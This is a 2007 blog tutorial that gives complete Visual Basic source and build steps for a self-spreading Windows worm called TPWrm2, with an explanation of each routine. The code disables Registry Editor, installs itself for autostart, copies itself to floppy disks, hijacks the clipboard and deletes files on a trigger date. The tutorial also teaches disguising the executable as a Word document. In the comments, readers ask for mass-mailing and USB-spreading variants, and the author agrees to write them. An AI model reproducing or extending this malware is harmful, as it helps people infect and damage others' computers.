This is a Premium Blog

Worm Programming (again!!)

Written on June 5, 2007 by admin

This worm name is TPWrm2 (TutorialsPortal Worm 2), a worm that smarter than TPWrm1 because has WSH (Windows Scripting Host) for registry manipulate or for detect special folder in Windows operating system, and prevent user from running Registry Editor. Because of that, this worm can infect Windows 9x, ME, NT, 2000, and XP.

Algorithm

1. This worm using Word icon to fraud user.

2. Checking worm existence in a certain computer system.

3. If worm doesn’t find it existence, this worm will copying itself to System Windows folder and manipulate the registry for automatic run this worm every windows start.

4. Every 1 minute try to copying itself to floppy disk with file name “lieke.exe”

5. Every user Paste sentences, word, or anything, this worm will change the sentence to “Love Lieke So Much…”

6. Every 13th October, this worm will show “TPWrm2 is in your computer”, delete all files with tmp extension in Windows folder, and stop all worm activity on that day.

 

Coding

Create new project, change Project Name to TPWrm2, on Make tab, change Application Title to TPWrm2, on Compile tab, set Compile to P-Code.

Add 2 Timer, and change properties for each Timer and form with:

Form1
Name: frmTPWrm2
Icon: (icon)
ShowInTaskbar: False
Visible: False

Timer1
Name: tmrTPWrm2
Enable: True
Interval: 60000

Timer2
Name: tmrLieke
Enable: True
Interval: 1000

Write this code:

PLAIN TEXT
Visual Basic:
  1. 'TPWrm2 By -RiE- @ tutorialsportal.com
  2. 'Bogor, West Java, Indonesia
  3. Option Explicit
  4.  
  5. Private Sub Form_Load()
  6. On Error Resume Next
  7. If App.PrevInstance = True Then End
  8. Call RegDisable
  9. Call InfectSystem
  10. If App.Path = "A:\" Or App.Path = "B:\" Then
  11. Unload Me
  12. End If
  13. End Sub
  14.  
  15. Private Sub tmrLieke_Timer()
  16. On Error Resume Next
  17. Clipboard.Clear
  18. Clipboard.SetText " Love Lieke So Much... "
  19. End Sub
  20.  
  21. Private Sub tmrTPWrm2_Timer()
  22. On Error Resume Next
  23. Call InfectFloppy
  24. If Day(Now) = 13 And Month(Now) = 10 Then
  25. Call PayLoad
  26. Unload Me
  27. End If
  28. End Sub
  29.  
  30. Function RegString(HiveAndKey As String, Value As String)
  31. Dim newbie As Variant
  32. Set newbie = CreateObject("Wscript.Shell")
  33. newbie.regwrite HiveAndKey, Value
  34. End Function
  35.  
  36. Function RegDword(HiveAndKey As String, Value As Integer)
  37. Dim newbie As Variant
  38. Set newbie = CreateObject("Wscript.Shell")
  39. newbie.regwrite HiveAndKey, Value, "REG_DWORD"
  40. End Function
  41.  
  42. Private Sub RegDisable()
  43. On Error Resume Next
  44. RegDword "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\" & _
  45. "System\DisableRegistryTools", 1
  46. End Sub
  47.  
  48. Private Sub InfectSystem()
  49. On Error Resume Next
  50. Dim kiddie As Variant
  51. Dim sysfolder As Object
  52. Set kiddie = CreateObject("scripting.filesystemobject")
  53. Set sysfolder = kiddie.GetSpecialFolder(1)
  54. FileCopy WormFile, sysfolder & "\" & "winfake.exe"
  55. RegString "HKLM\Software\Microsoft\Windows\CurrentVersio" & _
  56. "n\Run\windll", sysfolder & "\" & "winfake.exe"
  57. End Sub
  58.  
  59. Private Sub InfectFloppy()
  60. On Error Resume Next
  61. If Len(Dir$("A:\lieke.exe")) = 0 Then
  62. FileCopy WormFile, "A:\lieke.exe"
  63. End If
  64. End Sub
  65.  
  66. Private Sub PayLoad()
  67. On Error Resume Next
  68. Dim kiddie As Variant
  69. Dim winfolder, sysfolder, tmpfolder As Object
  70. Set kiddie = CreateObject("scripting.filesystemobject")
  71. Set winfolder = kiddie.GetSpecialFolder(0)
  72. Set sysfolder = kiddie.GetSpecialFolder(1)
  73. Set tmpfolder = kiddie.GetSpecialFolder(2)
  74. Kill winfolder & "\" & "*.tmp"
  75. Kill sysfolder & "\" & "*.bak"
  76. Kill tmpfolder & "\" & "*.*"
  77. MsgBox "TPWrm2 is in your computer..!"
  78. End Sub
  79.  
  80. Private Function WormFile()
  81. Dim WPath, WName As String
  82. WPath = App.Path
  83. If Right(WPath, 1) <> "\" Then
  84. WPath = WPath & "\"
  85. End If
  86. WName = App.EXEName & ".exe"
  87. WormFile = WPath & WName
  88. End Function

Compile this project, File > Make TPWrm2 > in File Name type "Secret.doc .exe"
We use Secret.doc .exe as file name because if user see this file in Windows Explorer, they think that 'Secret' is Word document and will execute this worm. Social Engineering right??
Worm Programming - Virus Tutorials

Source Code Description

PLAIN TEXT
Visual Basic:
  1. 'TPWrm2 By -RiE- @ tutorialsportal.com
  2. 'Bogor, West Java, Indonesia
  3. Option Explicit
  4.  
  5. Private Sub Form_Load()
  6. On Error Resume Next
  7. If App.PrevInstance = True Then End
  8. Call RegDisable
  9. Call InfectSystem
  10. If App.Path = "A:\" Or App.Path = "B:\" Then
  11. Unload Me
  12. End If
  13. End Sub

Call RegDisable mean execute RegDisable procedure and statement Call InfectSystem mean execute InfectSystem procedure.
If main file locate in drive A or B, then kill main process.

PLAIN TEXT
Visual Basic:
  1. Private Sub tmrLieke_Timer()
  2. On Error Resume Next
  3. Clipboard.Clear
  4. Clipboard.SetText " Love Lieke So Much... "
  5. End Sub

Clipboard.Clear is for clearing data from Clipboard, then next statement mean insert "Love Lieke So Much..." to the clipboard.

PLAIN TEXT
Visual Basic:
  1. Private Sub tmrTPWrm2_Timer()
  2. On Error Resume Next
  3. Call InfectFloppy
  4. If Day(Now) = 13 And Month(Now) = 10 Then
  5. Call PayLoad
  6. Unload Me
  7. End If
  8. End Sub

Every 60000 or 60 second, execute InfectFloppy procedure, then if date and month is 13th October, execute PayLoad procedure and kill worm process.

PLAIN TEXT
Visual Basic:
  1. Function RegString(HiveAndKey As String, Value As String)
  2. Dim newbie As Variant
  3. Set newbie = CreateObject("Wscript.Shell")
  4. newbie.regwrite HiveAndKey, Value
  5. End Function
  6.  
  7. Function RegDword(HiveAndKey As String, Value As Integer)
  8. Dim newbie As Variant
  9. Set newbie = CreateObject("Wscript.Shell")
  10. newbie.regwrite HiveAndKey, Value, "REG_DWORD"
  11. End Function

This function is Windows Script Host (WSH) that will access registry to add key and value. RegString function is to add value and key (REG_SZ) and RedDword is to add value and key (REG_DWORD)

PLAIN TEXT
Visual Basic:
  1. Private Sub RegDisable()
  2. On Error Resume Next
  3. RegDword "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\" & _
  4. "System\DisableRegistryTools", 1
  5. End Sub

RegDisable procedure execute RedDword function to add: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools with value:1

PLAIN TEXT
Visual Basic:
  1. Private Sub InfectSystem()
  2. On Error Resume Next
  3. Dim kiddie As Variant
  4. Dim sysfolder As Object
  5. Set kiddie = CreateObject("scripting.filesystemobject")
  6. Set sysfolder = kiddie.GetSpecialFolder(1)
  7. FileCopy WormFile, sysfolder & "\" & "winfake.exe"
  8. RegString "HKLM\Software\Microsoft\Windows\CurrentVersio" & _
  9. "n\Run\windll", sysfolder & "\" & "winfake.exe"
  10. End Sub

InfectSystem procedure use system object to get Special Folder in Windows. In this worm Special Folder 1 or System Windows folder, then copy itself to System Windows folder with name "winfake.exe".
This procedure execute RegString function to add HKLM\Microsoft\Windows\CurrentVersion\Run\windll with value System Windows and winfake.exe. This key is usefull to execute winfake.exe every startup.

PLAIN TEXT
Visual Basic:
  1. Private Sub InfectFloppy()
  2. On Error Resume Next
  3. If Len(Dir$("A:\lieke.exe")) = 0 Then
  4. FileCopy WormFile, "A:\lieke.exe"
  5. End If
  6. End Sub

This procedure will copy worm to drive A with name "lieke.exe"

PLAIN TEXT
Visual Basic:
  1. Private Sub PayLoad()
  2. On Error Resume Next
  3. Dim kiddie As Variant
  4. Dim winfolder, sysfolder, tmpfolder As Object
  5. Set kiddie = CreateObject("scripting.filesystemobject")
  6. Set winfolder = kiddie.GetSpecialFolder(0)
  7. Set sysfolder = kiddie.GetSpecialFolder(1)
  8. Set tmpfolder = kiddie.GetSpecialFolder(2)
  9. Kill winfolder & "\" & "*.tmp"
  10. Kill sysfolder & "\" & "*.bak"
  11. Kill tmpfolder & "\" & "*.*"
  12. MsgBox "TPWrm2 is in your computer..!"
  13. End Sub

PayLoad procedure use file system object to get special folder 0 or Windows folder, special folder1 or System Windows folder, and special folder2 or Temporary folder, then delete all file with 'tmp' extension in Windows folder, all file with 'bak' extension in System Windows, and all file in Temporary folder. Then, worm will show "TPWrm2 is in your computer..!"

PLAIN TEXT
Visual Basic:
  1. Private Function WormFile()
  2. Dim WPath, WName As String
  3. WPath = App.Path
  4. If Right(WPath, 1) <> "\" Then
  5. WPath = WPath & "\"
  6. End If
  7. WName = App.EXEName & ".exe"
  8. WormFile = WPath & WName
  9. End Function

WormFile function is to get full path to main file.

Posted in Visual Basic Tutorials
Tags: , , ,

If you enjoyed this post Subscribe to our feed

8 Comments on “Worm Programming (again!!)”

  1. TPWrm3 | TutorialsPortal | June 5th, 2007at 2:38 pm

    […] is same with previous tutorial […]

  2. harry | August 12th, 2007at 12:56 pm

    this is realy cool.
    im only just learning vb to make viruses.
    im not very experienced and im having a hard time learning the script.
    i hav 2 questions.
    1) all the Kill winfolder & “\” & “*.tmp” and Kill sysfolder & “\” & “*.bak”, can they be maliciouse to my computer while i am testing the virus?
    2) could you write a script that emters outlook express and posts the virus to all the people in the contact book?

    thnx

  3. -RiE- | August 12th, 2007at 8:52 pm

    thanks harry

    1. yes of course, so I recommended you to install deep freeze before or use virtual pc
    2. yes, i will write it soon

  4. harry | August 13th, 2007at 6:12 pm

    few!
    i was about to run it and screw up my computer
    thanx, nice save
    lol

  5. artur | September 17th, 2007at 8:00 pm

    hi there i don’t know why but when i click on Compile this project, File > Make TPWrm2 > in File Name type “Secret.doc .exe” it appers
    compile error
    “syntax error”
    need help
    plz write as soon as possible

  6. artur | September 18th, 2007at 12:45 am

    my xp version is in portuguese may it be because of that

  7. johntotetwoo | April 1st, 2008at 9:37 pm

    detected by mcafee and kaspersky

  8. mahethere | August 6th, 2008at 8:00 pm

    how can i design a virus that starts running when I open the flash disk assuming that the virus is contained in the flash?
    please help. send reply to mahethere@yahoo.com

Leave a Reply